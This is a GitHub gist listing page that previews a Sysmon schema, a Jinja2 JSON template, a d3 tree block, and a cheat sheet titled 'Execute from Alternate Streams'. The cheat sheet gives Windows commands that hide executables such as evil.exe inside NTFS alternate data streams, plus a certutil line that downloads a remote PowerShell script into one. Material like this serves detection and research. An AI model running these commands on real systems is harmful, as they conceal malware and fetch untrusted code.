Skip to content

Instantly share code, notes, and snippets.

View ikiril01's full-sized avatar

Ivan Kirillov ikiril01

56 followers · 2 following
View GitHub Profile
@olafhartong
olafhartong / sysmon-104-schema.xml
Created August 27, 2019 18:38
<manifest schemaversion="4.22" binaryversion="9.20">
<configuration>
<options>
<!-- Command-line only options -->
<option switch="i" name="Install" argument="optional" noconfig="true" exclusive="true" />
<option switch="c" name="Configuration" argument="optional" noconfig="true" exclusive="true" />
<option switch="u" name="UnInstall" argument="optional" noconfig="true" exclusive="true" />
<option switch="m" name="Manifest" argument="none" noconfig="true" exclusive="true" />
<option switch="t" name="DebugMode" argument="optional" noconfig="true" />
<option switch="s" name="PrintSchema" argument="optional" noconfig="true" exclusive="true" />
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 4, 2024 03:48
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@sevennineteen
sevennineteen / example.json
Created December 28, 2012 18:16
Example using Jinja2 to populate a JSON payload template
{ "path": "/content/geometrixx/my-first-jinja-page",
"properties": [
{ "name": "jcr:primaryType",
"value": "cq:Page" }],
"nodes": [
{ "path": "jcr:content",
"properties": [
{ "name": "jcr:primaryType",
"value": "cq:PageContent"},
@mbostock
mbostock / .block
Last active March 29, 2023 23:39
Collapsible Indented Tree
license: gpl-3.0
redirect: https://observablehq.com/@d3/indented-tree